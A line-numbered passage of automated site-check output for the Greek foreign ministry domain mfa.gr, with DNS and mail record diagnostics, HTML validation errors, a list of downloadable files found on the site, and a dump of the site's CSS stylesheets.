  1311. Info    DNS Parent sent Glue    The parent nameserver gr-us.ics.forth.gr is not sending out GLUE for every nameservers listed, meaning he is sending out your nameservers host names without sending the A records of those nameservers. It's ok but you have to know that this will require an extra A lookup that can delay a little the connections to your site. This happens a lot if you have nameservers on different TLD (domain.com for example with nameserver ns.domain.org.)
  1312. Pass    Nameservers A records   Good. Every nameserver listed has A records. This is a must if you want to be found.
  1313. NS      Info    NS records from your nameservers        NS records got from your nameservers listed at the parent NS are:
  1314.  
  1315. ns1.otenet.gr  ['195.170.0.2']   [TTL=21600]
  1316. dnsa.mfa.gr  ['195.167.30.162']   [TTL=21600]
  1317. ns2.otenet.gr  ['195.170.2.1']   [TTL=21600]
  1318.  
  1319. Pass    Recursive Queries       Good. Your nameservers (the ones reported by the parent server) do not report that they allow recursive queries for anyone.
  1320. Pass    Same Glue       The A records (the GLUE) got from the parent zone check are the same as the ones got from your nameservers. You have to make sure your parent server has the same NS records for your zone as you do according to the RFC. This tests only nameservers that are common at the parent and at your nameservers. If there are any missing or stealth nameservers you should see them below!
  1321. Information     Glue for NS records     INFO: GLUE was not sent when I asked your nameservers for your NS records.This is ok but you should know that in this case an extra A record lookup is required in order to get the IPs of your NS records. The nameservers without glue are:
  1322. 195.167.30.162
  1323. You can fix this for example by adding A records to your nameservers for the zones listed above.
  1324. Pass    Mismatched NS records   OK. The NS records at all your nameservers are identical.
  1325. Pass    DNS servers responded   Good. All nameservers listed at the parent server responded.
  1326. Pass    Name of nameservers are valid   OK. All of the NS records that your nameservers report seem valid.
  1327. Pass    Multiple Nameservers    Good. You have multiple nameservers. According to RFC2182 section 5 you must have at least 3 nameservers, and no more than 7. Having 2 nameservers is also ok by me.
  1328. Pass    Nameservers are lame    OK. All the nameservers listed at the parent servers answer authoritatively for your domain.
  1329. Pass    Missing nameservers reported by parent  OK. All NS records are the same at the parent and at your nameservers.
  1330. Pass    Missing nameservers reported by your nameservers        OK. All nameservers returned by the parent server gr-us.ics.forth.gr are the same as the ones reported by your nameservers.
  1331. Pass    Domain CNAMEs   OK. RFC1912 2.4 and RFC2181 10.3 state that there should be no CNAMEs if an NS (or any other) record is present.
  1332. Pass    NSs CNAME check         OK. RFC1912 2.4 and RFC2181 10.3 state that there should be no CNAMEs if an NS (or any other) record is present.
  1333. Pass    Different subnets       OK. Looks like you have nameservers on different subnets!
  1334. Pass    IPs of nameservers are public   Ok. Looks like the IP addresses of your nameservers are public. This is a good thing because it will prevent DNS delays and other problems like
  1335. Pass    DNS servers allow TCP connection        OK. Seems all your DNS servers allow TCP connections. This is a good thing and useful even if UDP connections are used by default.
  1336. Pass    Different autonomous systems    OK. It seems you are safe from a single point of failure. You must be careful about this and try to have nameservers on different locations as it can prevent a lot of problems if one nameserver goes down.
  1337. Pass    Stealth NS records sent         Ok. No stealth ns records are sent
  1338. SOA     Info    SOA record      The SOA record is:
  1339. Primary nameserver: dnsa.mfa.gr
  1340. Hostmaster E-mail address: internet.mfa.gr
  1341. Serial #: 2012071900
  1342. Refresh: 10800
  1343. Retry: 3600
  1344. Expire: 21600   6 hours
  1345. Default TTL: 3600
  1346. Pass    NSs have same SOA serial        OK. All your nameservers agree that your SOA serial number is 2012071900.
  1347. Pass    SOA MNAME entry         OK. dnsa.mfa.gr That server is listed at the parent servers.
  1348. Pass    SOA Serial      Your SOA serial number is: 2012071900. This appears to be in the recommended format of YYYYMMDDnn.
  1349. Pass    SOA REFRESH     OK. Your SOA REFRESH interval is: 10800. That is OK
  1350. Pass    SOA RETRY       Your SOA RETRY value is: 3600. Looks ok
  1351. Warn    SOA EXPIRE      Your SOA EXPIRE number is: 21600. That is NOT OK
  1352. Pass    SOA MINIMUM TTL         Your SOA MINIMUM TTL is: 3600. This value was used to serve as a default TTL for records without a given TTL value and now is used for negative caching (indicates how long a resolver may cache the negative answer). RFC2308 recommends a value of 1-3 hours. Your value of 3600 is OK.
  1353. MX      Info    MX Records      Your MX records that were reported by your nameservers are:
  1354.  
  1355. 10   mailhost.mfa.gr   84.205.251.31
  1356.  
  1357. [These are all the MX records that I found. If there are some non common MX records at your nameservers you should see them below. ]
  1358. Pass    Different MX records at nameservers     Good. Looks like all your nameservers have the same set of MX records. This tests to see if there are any MX records not reported by all your nameservers and also MX records that have the same hostname but different IPs
  1359. Pass    MX name validity        Good. I did not detect any invalid hostnames for your MX records.
  1360. Pass    MX IPs are public       OK. All of your MX records appear to use public IPs.
  1361. Pass    MX CNAME Check  OK. No problems here.
  1362. Pass    MX A request returns CNAME      OK. No CNAMEs returned for A records lookups.
  1363. Pass    MX is not IP    OK. All of your MX records are host names.
  1364. Info    Number of MX records    OK. Looks like you only have one MX record at your nameservers. You should be careful about what you are doing since you have a single point of failure that can lead to mail being lost if the server is down for a long time.
  1365. Pass    Mismatched MX A         OK. I did not detect differing IPs for your MX records.
  1366. Pass    Duplicate MX A records  OK. I have not found duplicate IP(s) for your MX records. This is a good thing.
  1367. Pass    Reverse MX A records (PTR)      Your reverse (PTR) record:
  1368. 31.251.205.84.in-addr.arpa ->  mailhost.mfa.gr
  1369. You have reverse (PTR) records for all your IPs, that is a good thing.
  1370. WWW     Info    WWW A Record    Your www.mfa.gr A record is:
  1371. www.mfa.gr  [84.205.251.33]
  1372. Pass    IPs are public  OK. All of your WWW IPs appear to be public IPs.
  1373. Pass    WWW CNAME       OK. No CNAME
  1374. Validation Output: 2 Errors
  1375.  
  1376.     Error Line 2, Column 5: XML declaration allowed only at the start of the document
  1377.  
  1378.     <?xml version="1.0" encoding="UTF-8"?>
  1379.  
  1380.     ✉
  1381.     Error Line 635, Column 19: Entity 'copy' not defined
  1382.  
  1383.           Copyright &copy; 2012 Ελληνική Δημοκρατία - Υπουργείο Εξωτερικών
  1384.  
  1385. Download tests for mfa.gr:
  1386.  
  1387. Downloads we found on this site:
  1388. Download        Analysis
  1389.  
  1390. Microsoft Office Word Viewer 2003 (wdviewer.exe)
  1391.        
  1392.  
  1393. CoffeeCup Free Viewer Plus (CoffeeFreeImageViewer.exe)
  1394.        
  1395.  
  1396. Microsoft Office PowerPoint Viewer 2003 (ppviewer.exe)
  1397.        
  1398.  
  1399. Microsoft Office Excel Viewer 2003 (xlviewer.exe)
  1400.        
  1401.  
  1402. CoffeeFreeImageViewer.exe
  1403.        
  1404.  
  1405. * {
  1406. margin : 0;
  1407. padding : 0;
  1408. }
  1409. h1, h2, h3, h4, h5, h6, p, blockquote, form, label, ul, ol, dl, fieldset, address {
  1410. margin : 0.5em 0;
  1411. }
  1412. li, dd {
  1413. margin-left : 1em;
  1414. }
  1415. fieldset {
  1416. padding : 0.5em;
  1417. }
  1418. body {
  1419. font-size : 76.1%;
  1420. font-family : verdana, arial, helvetica, sans-serif;
  1421. line-height : 1.3em;
  1422. color : #000;
  1423. background-color : #fff;
  1424. }
  1425. strong, b {
  1426. font-weight : bold;
  1427. }
  1428. em, i {
  1429. font-style : italic;
  1430. }
  1431. pre {
  1432. font-family : monospace;
  1433. }
  1434. img {
  1435. border : 0;
  1436. }
  1437. ol, ul, li {
  1438. font-size : 1.0em;
  1439. line-height : 1.3em;
  1440. margin-top : 0.2em;
  1441. margin-bottom : 0.1em;
  1442. }
  1443. p {
  1444. font-size : 1.0em;
  1445. line-height : 1.3em;
  1446. margin : 1.2em 0 1.2em 0;
  1447. }
  1448. li > p {
  1449. margin-top : 0.2em;
  1450. }
  1451. ul {
  1452. margin-left : 0.5em;
  1453. }
  1454. li {
  1455. list-style-type : none;
  1456. }
  1457. h1 {
  1458. font-size : 2.0em;
  1459. margin : 0.8em 0 0.8em 0;
  1460. font-weight : normal;
  1461. }
  1462. h2 {
  1463. font-size : 1.7em;
  1464. margin : 0.8em 0 0.8em 0;
  1465. font-weight : normal;
  1466. }
  1467. h3 {
  1468. font-size : 1.4em;
  1469. margin : 0.8em 0 0.8em 0;
  1470. font-weight : normal;
  1471. }
  1472. h4 {
  1473. font-size : 1.2em;
  1474. margin : 0.8em 0 0.8em 0;
  1475. font-weight : bold;
  1476. }
  1477. h5 {
  1478. font-size : 1.0em;
  1479. margin : 0.8em 0 0.8em 0;
  1480. font-weight : bold;
  1481. }
  1482. h6 {
  1483. font-size : 0.8em;
  1484. margin : 0.8em 0 0.8em 0;
  1485. font-weight : bold;
  1486. }
  1487. body.contentpane {
  1488. text-align : left;
  1489. }
  1490. .clear {
  1491. clear : both;
  1492. }
  1493. div.message {
  1494. clear : both;
  1495. background-color : #c3e5fc;
  1496. border : #6899b8 dashed 1px;
  1497. padding : 5px;
  1498. margin : 5px;
  1499. font-weight : bold;
  1500. }
  1501. .elxerror {
  1502. clear : both;
  1503. margin : 20px 0;
  1504. background : url(../images/M_images/stop48.png) 50% 5px no-repeat #fdd5d5;
  1505. padding : 5px 5px 5px 60px;
  1506. border : #e1323c solid 1px;
  1507. font-size : 1em;
  1508. font-weight : bold;
  1509. color : #990000;
  1510. text-align : left;
  1511. min-height : 60px;
  1512. }
  1513. .elxwarning {
  1514. clear : both;
  1515. margin : 20px 0;
  1516. background : url(../images/M_images/warning48.png) 50% 5px no-repeat #fcf8ca;
  1517. padding : 5px 5px 5px 60px;
  1518. border : #febf62 solid 1px;
  1519. font-size : 1em;
  1520. font-weight : bold;
  1521. color : #d58002;
  1522. text-align : left;
  1523. min-height : 60px;
  1524. }
  1525. .text_area, .inputbox, .selectbox {
  1526. margin : 2px 0 2px 0;
  1527. padding : 1px;
  1528. }
  1529. .userlogin {
  1530. width : 100%;
  1531. display : block;
  1532. padding : 2px;
  1533. position : relative;
  1534. margin : 0;
  1535. }
  1536. .userlogin img {
  1537. margin : 2px;
  1538. padding : 2px;
  1539. border : #666 solid 1px;
  1540. float : left;
  1541. }
  1542. ul.table {
  1543. list-style : none;
  1544. padding : 1px 0;
  1545. background : inherit;
  1546. text-indent : 0;
  1547. }
  1548. ul.table li {
  1549. padding : 2px;
  1550. margin : 2px;
  1551. text-indent : 0;
  1552. clear : both;
  1553. float : left;
  1554. width : 98%;
  1555. }
  1556. img.screenshot {
  1557. border : 0;
  1558. float : left;
  1559. padding : 2px 5px 2px 2px;
  1560. }
  1561. ul.table li.row0, ul.table li.sectiontableentry1 {
  1562. background-color : #eeeeee;
  1563. }
  1564. ul.table li.row1, ul.table li.sectiontableentry2 {
  1565. background-color : #f9f9f0;
  1566. }
  1567. .business-card {
  1568. background-color : #f5f5f5;
  1569. padding : 5px;
  1570. margin : 5px;
  1571. float : left;
  1572. width : 96%;
  1573. border : silver solid 1px;
  1574. }
  1575. .business-card img.card {
  1576. padding : 2px;
  1577. margin : 2px;
  1578. border : silver solid 1px;
  1579. }
  1580. dl.card-info {
  1581. margin : 0;
  1582. padding : 0;
  1583. }
  1584. dl.card-info dt {
  1585. font-weight : bold;
  1586. font-size : 1.2em;
  1587. color : #444;
  1588. margin : 0;
  1589. padding : 0;
  1590. }
  1591. dl.card-info dd {
  1592. margin : 0;
  1593. font-size : 0.925em;
  1594. }
  1595. dl.card-info img {
  1596. vertical-align : top;
  1597. border : 0;
  1598. margin : 1px;
  1599. }
  1600. .small {
  1601. font-size : 0.75em;
  1602. }
  1603. .avatarbox {
  1604. display : block;
  1605. position : relative;
  1606. float : left;
  1607. background-color : #eeeeee;
  1608. border : #999999 solid 1px;
  1609. color : #000000;
  1610. font-size : 0.9em;
  1611. margin : 2px;
  1612. padding : 2px;
  1613. width : 220px;
  1614. }
  1615. #useravatar {
  1616. text-align : center;
  1617. width : 110px;
  1618. display : block;
  1619. position : relative;
  1620. float : left;
  1621. }
  1622. #useravatar img {
  1623. margin : 2px;
  1624. padding : 2px;
  1625. border : #cccccc solid 1px;
  1626. }
  1627. #useravatar #useravatarname {
  1628. background-color : #aaaaaa;
  1629. color : #ffffff;
  1630. font-size : 11px;
  1631. margin : 2px;
  1632. text-align : center;
  1633. display : block;
  1634. }
  1635. #useravatar #useravatarname img {
  1636. padding : 1px;
  1637. border : 0;
  1638. }
  1639. .profile_signature {
  1640. background-color : #eeeeee;
  1641. padding : 2px;
  1642. color : #333333;
  1643. font-style : italic;
  1644. border : #999999 dashed 1px;
  1645. }
  1646. a.mainlevel {
  1647. display : block;
  1648. }
  1649. ul.contenttoc {
  1650. border : #666666 solid 1px;
  1651. }
  1652. ul.contenttoc li {
  1653. background : inherit;
  1654. list-style-type : none;
  1655. text-align : left;
  1656. padding-left : 5px;
  1657. padding-right : 5px;
  1658. margin : 0;
  1659. }
  1660. ul.contenttoc li.headtoc {
  1661. list-style-type : none;
  1662. background-color : #666666;
  1663. color : #ffffff;
  1664. font-weight : bold;
  1665. }
  1666. h1.contentheading, h1.componentheading {
  1667. font-size : 1.3em;
  1668. font-weight : bold;
  1669. margin : 0 0 0.7em 0;
  1670. border : 0;
  1671. }
  1672. h2.contentheading {
  1673. font-size : 1em;
  1674. font-weight : bold;
  1675. margin : 0.4em 0 0.4em 0;
  1676. border : 0;
  1677. }
  1678. .contentpaneopen, .contentpane {
  1679. padding : 0;
  1680. margin : 0;
  1681. width : 100%;
  1682. }
  1683. .contentdescription {
  1684. background : none;
  1685. margin-top : 0;
  1686. border : none;
  1687. padding : 0;
  1688. }
  1689. .contentpaneopen_text {
  1690. padding : 1em 0 1em 0;
  1691. margin : 0;
  1692. }
  1693. .item_createdate, .item_modifydate {
  1694. font-style : italic;
  1695. }
  1696. .sectiontablefooter {
  1697. text-align : center;
  1698. margin : 5px;
  1699. padding : 5px;
  1700. }
  1701. div.table, div.blog, div.blogleading, div.blog_more {
  1702. margin : 4px 0 4px 0;
  1703. padding : 0;
  1704. width : auto;
  1705. }
  1706. div.tablerow, div.blogrow {
  1707. margin : 0;
  1708. padding : 0;
  1709. width : 100%;
  1710. float : left;
  1711. }
  1712. div.tablecell, div.blogcell {
  1713. margin : 0;
  1714. padding : 0;
  1715. width : 49%;
  1716. float : left;
  1717. }
  1718. .moreLinks {
  1719. padding : 10px 0 5px 0;
  1720. font-weight : bold;
  1721. font-size : 1.2em;
  1722. }
  1723. .mp3audio {
  1724. padding : 5px;
  1725. }
  1726. .highlight {
  1727. background-color : #fbfa84;
  1728. color : #000;
  1729. padding : 0 2px;
  1730. font-weight : bold;
  1731. }
  1732. span.polltitle {
  1733. font-weight : bold;
  1734. }
  1735. ul.polltable {
  1736. list-style : none;
  1737. padding : 1px 0;
  1738. background : inherit;
  1739. text-indent : 0;
  1740. }
  1741. ul.polltable li {
  1742. padding : 2px;
  1743. margin : 2px;
  1744. text-indent : 0;
  1745. }
  1746. ul.polltable li.row0 {
  1747. background-color : #eeeeee;
  1748. }
  1749. ul.polltable li.row1 {
  1750. background-color : #f9f9f0;
  1751. }
  1752. .modfpg-container {
  1753. float : left;
  1754. padding : 0;
  1755. margin : 0;
  1756. margin-bottom : 5px;
  1757. width : 100%;
  1758. }
  1759. .modfpg-row {
  1760. padding : 0;
  1761. margin : 0;
  1762. margin-bottom : 5px;
  1763. float : left;
  1764. width : 100%;
  1765. }
  1766. .modfpg-box {
  1767. float : left;
  1768. padding : 2px;
  1769. margin : 2px;
  1770. text-align : justify;
  1771. }
  1772. .modfpg-ctitle {
  1773. font-weight : bold;
  1774. font-size : 100%;
  1775. border-bottom : 1px solid #ccc;
  1776. display : block;
  1777. padding-bottom : 5px;
  1778. margin-bottom : 5px;
  1779. background : url(../images/M_images/green_arrow.gif) top left no-repeat;
  1780. padding-left : 20px;
  1781. }
  1782. .modfpg-introtitle a, .modfpg-introtitle a:visited, .modfpg-introtitle a:active {
  1783. font-weight : bold;
  1784. color : #333;
  1785. }
  1786. .modfpg-introtitle a:hover {
  1787. text-decoration : underline;
  1788. }
  1789. .modfpg-authordate {
  1790. color : #666;
  1791. font-size : 0.8em;
  1792. font-weight : normal;
  1793. height : 0.85em;
  1794. }
  1795. .modfpg-img {
  1796. float : left;
  1797. margin : 0.3em;
  1798. }
  1799. .modfpg-ul {
  1800. list-style : none;
  1801. }
  1802. .modfpg-ul li {
  1803. font-size : 0.90em;
  1804. }
  1805. .modfpg-ul li a, .modfpg-box li a:hover, .modfpg-box li a:visited {
  1806. text-decoration : none;
  1807. }
  1808. .polls_color_1 {
  1809. background-color : #8d1b1b;
  1810. border : #b22222 ridge 2px;
  1811. }
  1812. .polls_color_2 {
  1813. background-color : #6740e1;
  1814. border : #4169e1 ridge 2px;
  1815. }
  1816. .polls_color_3 {
  1817. background-color : #8d8d8d;
  1818. border : #d2d2d2 ridge 2px;
  1819. }
  1820. .polls_color_4 {
  1821. background-color : #cc8500;
  1822. border : #ffa500 ridge 2px;
  1823. }
  1824. .polls_color_5 {
  1825. background-color : #5b781e;
  1826. border : #6b8e23 ridge 2px;
  1827. }
  1828. .pollstableborder {
  1829. border : solid 1px;
  1830. padding : 2px;
  1831. }
  1832. div.commentsrow {
  1833. min-height : 70px;
  1834. border-bottom : 1px dotted #ccc;
  1835. margin : 10px 0;
  1836. padding : 5px 0;
  1837. }
  1838. .elxisfieldset {
  1839. margin : 20px 0;
  1840. font-size : 0.92em;
  1841. line-height : 1.1em;
  1842. }
  1843. .elxisfieldset legend {
  1844. font-weight : bold;
  1845. padding : 0 5px;
  1846. }
  1847. .elxislabel {
  1848. width : 30%;
  1849. float : left;
  1850. }
  1851. .elxisfieldset input.inputbox, .elxisfieldset textarea.text_area {
  1852. padding : 1px;
  1853. }
  1854. @import url('layout.css');
  1855. body {
  1856. background : #ffffff;
  1857. }
  1858. #container {
  1859. padding : 10px 0;
  1860. margin : 0;
  1861. width : 100%;
  1862. background : url(../images/mainbg.jpg) 0% 0% repeat-x #f6f6f6;
  1863. text-align : center;
  1864. }
  1865. #mainwrap {
  1866. margin : 0 auto;
  1867. width : 970px;
  1868. text-align : left;
  1869. height : 100% !important ;
  1870. height : 1%;
  1871. background : url(../images/wrapbg.jpg) 0% 0% repeat-y;
  1872. }
  1873. #main-body {
  1874. width : 970px;
  1875. float : left;
  1876. height : 100% !important ;
  1877. height : 1%;
  1878. }
  1879. #sitecontent {
  1880. float : left;
  1881. width : 670px;
  1882. overflow : hidden;
  1883. }
  1884. #rightcolumn {
  1885. float : right;
  1886. width : 285px;
  1887. overflow : hidden;
  1888. margin : 0 10px 5px 5px;
  1889. }
  1890. .inside {
  1891. padding : 10px 10px 10px 20px;
  1892. }
  1893. .inside-col {
  1894. margin : 0 4px 0 8px;
  1895. }
  1896. #content_advert1 {
  1897. position : relative;
  1898. float : left;
  1899. width : 670px;
  1900. }
  1901. #content_top_wrapper {
  1902. position : relative;
  1903. float : left;
  1904. clear : none;
  1905. width : 100%;
  1906. margin : 0;
  1907. padding : 0;
  1908. }
  1909. #content_user1 {
  1910. position : relative;
  1911. float : left;
  1912. width : 320px;
  1913. margin : 5px 2px 5px 20px;
  1914. }
  1915. #content_user2 {
  1916. position : relative;
  1917. float : right;
  1918. width : 320px;
  1919. margin : 5px 5px 5px 2px;
  1920. }
  1921. #position_top {
  1922. position : relative;
  1923. float : left;
  1924. clear : none;
  1925. width : 100%;
  1926. margin : 0;
  1927. padding : 0;
  1928. }
  1929. #header {
  1930. position : relative;
  1931. float : left;
  1932. width : 636px;
  1933. margin : 5px 5px 5px 20px;
  1934. padding-top : 10px;
  1935. display : block;
  1936. }
  1937. #headertop {
  1938. width : 970px;
  1939. height : 6px;
  1940. background : url(../images/topbg.jpg) 0% 0% no-repeat;
  1941. }
  1942. #mfaheader {
  1943. position : relative;
  1944. width : 970px;
  1945. height : 115px;
  1946. background : url(../images/mfaheaderbg.jpg) 0% 0% repeat-y;
  1947. }
  1948. #date_container {
  1949. position : relative;
  1950. float : left;
  1951. width : 30%;
  1952. height : 115px;
  1953. }
  1954. #dateinline {
  1955. position : relative;
  1956. float : left;
  1957. width : 100%;
  1958. margin : 0;
  1959. padding-top : 10px;
  1960. padding-left : 20px;
  1961. font-family : tahoma, arial, sans-serif;
  1962. font-size : 12px;
  1963. color : #6a6b6e;
  1964. }
  1965. #sitelogo {
  1966. position : relative;
  1967. float : left;
  1968. padding : 7px 0;
  1969. height : 100px;
  1970. width : 40%;
  1971. }
  1972. #language_container {
  1973. position : relative;
  1974. float : right;
  1975. width : 30%;
  1976. }
  1977. #language {
  1978. position : relative;
  1979. float : right;
  1980. width : 31px;
  1981. padding : 5px 20px;
  1982. }
  1983. #pathway_container {
  1984. width : 95%;
  1985. margin : 1px 0 0 20px;
  1986. padding-left : 5px;
  1987. background-color : #f4f5f6;
  1988. border : #cddbe9 dotted 1px;
  1989. }
  1990. #container_user3 {
  1991. position : relative;
  1992. float : left;
  1993. width : 970px;
  1994. margin : 0 auto;
  1995. background : url(../images/mfaheaderbg.jpg) 0% 0% repeat-y;
  1996. }
  1997. #content_user3 {
  1998. position : relative;
  1999. float : left;
  2000. width : 930px;
  2001. padding : 0 20px;
  2002. }
  2003. #toolbar_container {
  2004. position : relative;
  2005. width : 930px;
  2006. height : 28px;
  2007. margin : 0 20px;
  2008. z-index : 1000;
  2009. background : url(../images/bluemenu.jpg) 0% 0% repeat-x transparent;
  2010. border-top : 1px solid #05a9f5;
  2011. }
  2012. #toolbar {
  2013. position : relative;
  2014. float : left;
  2015. height : 28px;
  2016. width : 930px;
  2017. z-index : 1000;
  2018. }
  2019. #content_advert3 {
  2020. position : relative;
  2021. float : left;
  2022. margin : 0 auto;
  2023. width : 928px;
  2024. margin : 0 20px 5px 20px;
  2025. border-left : 1px solid #4e85d6;
  2026. border-right : 1px solid #4e85d6;
  2027. border-bottom : 1px solid #4e85d6;
  2028. background-color : #ffffff;
  2029. z-index : 100;
  2030. }
  2031. #fader {
  2032. position : relative;
  2033. float : left;
  2034. margin : 0 auto;
  2035. width : 970px;
  2036. z-index : 100;
  2037. }
  2038. #mfabanners {
  2039. position : relative;
  2040. float : left;
  2041. width : 636px;
  2042. margin : 5px 5px 5px 20px;
  2043. display : block;
  2044. }
  2045. #footercontainer {
  2046. width : 970px;
  2047. margin : 0 auto;
  2048. background : url(../images/mfaheaderbg.jpg) 0% 0% repeat-y;
  2049. }
  2050. #footer_sitemap {
  2051. position : relative;
  2052. width : 950px;
  2053. margin : 0 10px;
  2054. padding-top : 30px;
  2055. background : url(../images/footermap_bg.jpg) 0% 0% repeat-x;
  2056. }
  2057. #bottom_menu {
  2058. width : 970px;
  2059. margin : 0 auto;
  2060. display : block;
  2061. background : url(../images/bottom_menubg.jpg) 0% 0% repeat-y;
  2062. }
  2063. #copyright_container {
  2064. position : relative;
  2065. width : 970px;
  2066. margin : 0 auto;
  2067. background : url(../images/mfaheaderbg.jpg) 0% 0% repeat-y;
  2068. }
  2069. #content_user7 {
  2070. width : 800px;
  2071. margin : 0 auto;
  2072. text-align : center;
  2073. padding-top : 3px;
  2074. }
  2075. #copyright {
  2076. width : 970px;
  2077. padding : 3px 0;
  2078. color : #a09e9e;
  2079. font-size : 0.9em;
  2080. text-align : center;
  2081. }
  2082. #copyright a {
  2083. color : #0d88c1;
  2084. font-weight : bold;
  2085. text-decoration : none;
  2086. }
  2087. #copyright a:hover {
  2088. color : #ff9900;
  2089. }
  2090. #copyright_bottom {
  2091. position : relative;
  2092. width : 970px;
  2093. height : 6px;
  2094. background : url(../images/bottombg.jpg) 0% 0% repeat-y;
  2095. }
  2096. .ypex_footerinner {
  2097. padding : 0;
  2098. margin : 0 auto;
  2099. width : 970px;
  2100. position : relative;
  2101. }
  2102. @import url('customize.css');
  2103. a, a:visited, a:link, a:active {
  2104. color : #246fb4;
  2105. text-decoration : none;
  2106. }
  2107. a:hover {
  2108. color : #ff9900;
  2109. text-decoration : none;
  2110. }
  2111. a {
  2112. outline : none;
  2113. }
  2114. .inputbox, .text_area, .selectbox {
  2115. background-color : #ffffff;
  2116. border : #78a1bb solid 1px;
  2117. padding : 2px 0 2px 0;
  2118. margin : 1px;
  2119. color : #000;
  2120. }
  2121. .button {
  2122. background-color : #e0e7fc;
  2123. border : #2465a2 solid 1px;
  2124. color : #394a53;
  2125. font-family : tahoma, verdana, sans-serif;
  2126. font-weight : bold;
  2127. padding : 2px;
  2128. margin : 2px;
  2129. cursor : pointer;
  2130. }
  2131. blockquote {
  2132. font-family : "Gill Sans", "Trebuchet MS", Calibri, sans-serif;
  2133. background : url(../images/quote-left.gif) top left no-repeat transparent;
  2134. color : #555;
  2135. font-size : 13px;
  2136. font-style : italic;
  2137. line-height : 16px;
  2138. margin : 15px 0;
  2139. padding : 0 0 5px 39px;
  2140. width : auto;
  2141. }
  2142. blockquote p {
  2143. font-family : "Gill Sans", "Trebuchet MS", Calibri, sans-serif;
  2144. font-size : 13px;
  2145. background : url(../images/quote-right.gif) bottom right no-repeat transparent;
  2146. margin-top : 0;
  2147. padding : 0 39px 10px 0;
  2148. }
  2149. div.bubble {
  2150. margin : 15px 0 -24px 0;
  2151. clear : both;
  2152. }
  2153. div.bubble p {
  2154. background : url(../images/volume.png) 7px 4px no-repeat #f9f9f9;
  2155. font-size : 1em;
  2156. margin : 0;
  2157. padding : 6px 6px 6px 24px;
  2158. border : #ddd solid 1px;
  2159. color : #555;
  2160. }
  2161. div.bubble span {
  2162. display : block;
  2163. height : 46px !important ;
  2164. margin : 0;
  2165. padding : 31px 0 0 22px;
  2166. font-family : tahoma, verdana, arial, serif;
  2167. font-size : 12px;
  2168. font-weight : bold;
  2169. color : #666;
  2170. line-height : 15px;
  2171. background : url(../images/bubbles_bg.png) top left no-repeat transparent;
  2172. overflow : hidden;
  2173. }
  2174. p.small_error {
  2175. font-size : 1em;
  2176. line-height : 16px;
  2177. margin : 1em 0;
  2178. background : url(../images/exclamation-red.png) top left no-repeat transparent;
  2179. padding : 0 0 0 18px;
  2180. color : #ff370c;
  2181. }
  2182. p.small_warn {
  2183. font-size : 1em;
  2184. line-height : 16px;
  2185. margin : 1em 0;
  2186. background : url(../images/exclamation.png) top left no-repeat transparent;
  2187. padding : 0 0 0 18px;
  2188. color : #ff9900;
  2189. }
  2190. p.big_warn {
  2191. font-size : 1em;
  2192. margin : 1em 0;
  2193. padding : 10px 4px 10px 38px;
  2194. background : url(../images/warning32.png) 50% 2px no-repeat #fcf9c6;
  2195. border-top : 1px solid #feb526;
  2196. border-bottom : 1px solid #feb526;
  2197. color : #ff9900;
  2198. font-weight : bold;
  2199. }
  2200. p.small_info {
  2201. font-size : 1em;
  2202. line-height : 16px;
  2203. margin : 1em 0;
  2204. background : url(../images/information.png) top left no-repeat transparent;
  2205. padding : 0 0 0 18px;
  2206. color : #0d398b;
  2207. }
  2208. p.big_info {
  2209. font-size : 1em;
  2210. margin : 1em 0;
  2211. padding : 10px 4px 10px 38px;
  2212. background : url(../images/info32.png) 50% 2px no-repeat #e4f5ff;
  2213. border-top : 1px solid #a2d1ef;
  2214. border-bottom : 1px solid #a2d1ef;
  2215. color : #222;
  2216. }
  2217. p.small_help {
  2218. font-size : 1em;
  2219. line-height : 16px;
  2220. margin : 1em 0;
  2221. background : url(../images/help.png) top left no-repeat transparent;
  2222. padding : 0 0 0 18px;
  2223. }
  2224. p.big_help {
  2225. font-size : 1em;
  2226. margin : 1em 0;
  2227. padding : 10px 4px 10px 38px;
  2228. background : url(../images/help32.png) 50% 2px no-repeat #f8f8f8;
  2229. border-top : 1px solid #ddd;
  2230. border-bottom : 1px solid #ddd;
  2231. color : #222;
  2232. }
  2233. p.small_tick {
  2234. font-size : 1em;
  2235. line-height : 16px;
  2236. margin : 1em 0;
  2237. background : url(../images/tick.png) top left no-repeat transparent;
  2238. padding : 0 0 0 18px;
  2239. }
  2240. p.small_pin {
  2241. font-size : 1em;
  2242. line-height : 16px;
  2243. margin : 1em 0;
  2244. background : url(../images/pin.png) top left no-repeat transparent;
  2245. padding : 0 0 0 18px;
  2246. color : #666;
  2247. }
  2248. p.small_bulb {
  2249. font-size : 1em;
  2250. line-height : 16px;
  2251. margin : 1em 0;
  2252. background : url(../images/bulb.png) top left no-repeat transparent;
  2253. padding : 0 0 0 18px;
  2254. }
  2255. p.big_user {
  2256. font-size : 1em;
  2257. margin : 1em 0;
  2258. padding : 10px 4px 10px 38px;
  2259. background : url(../images/userinfo.png) 50% 2px no-repeat #e4f5ff;
  2260. border-top : 1px solid #a2d1ef;
  2261. border-bottom : 1px solid #a2d1ef;
  2262. color : #222;
  2263. }
  2264. .small {
  2265. font-family : tahoma, verdana, arial;
  2266. font-size : 0.9em;
  2267. color : #444;
  2268. }
  2269. .small-label {
  2270. font-size : 0.8em;
  2271. line-height : 1.2em;
  2272. }
  2273. div.back_button {
  2274. background : url(../images/back.png) 50% 0% no-repeat transparent;
  2275. padding-left : 18px;
  2276. margin : 10px;
  2277. }
  2278. div.back_button a:link, div.back_button a:visited {
  2279. color : #246fb4;
  2280. text-decoration : none;
  2281. }
  2282. div.back_button a:hover {
  2283. color : #ff9900;
  2284. text-decoration : none;
  2285. }
  2286. div.message {
  2287. clear : both;
  2288. background : url(../images/info32.png) 50% 0% no-repeat #c3e5fc;
  2289. border : #6899b8 dashed 1px;
  2290. padding : 8px 5px 8px 38px;
  2291. margin : 5px;
  2292. font-weight : bold;
  2293. }
  2294. span.pathway {
  2295. font-size : 0.8em;
  2296. margin : 0;
  2297. margin-left : 5px;
  2298. padding-left : 20px;
  2299. line-height : 22px;
  2300. color : #808080;
  2301. }
  2302. span.pathway a {
  2303. background : url(../images/path-arrows.gif) 50% 100% no-repeat;
  2304. padding-right : 16px;
  2305. font-weight : bold;
  2306. color : #808080;
  2307. text-decoration : none;
  2308. }
  2309. span.pathway img {
  2310. display : none;
  2311. }
  2312. a.pathway, a.pathway:visited {
  2313. color : #808080;
  2314. text-decoration : none;
  2315. }
  2316. a.pathway:hover {
  2317. text-decoration : underline;
  2318. }
  2319. h1.contentheading, h1.componentheading {
  2320. font-size : 1.1em;
  2321. font-weight : bold;
  2322. color : #224f65;
  2323. padding : 0.3em 0 0.1em 0;
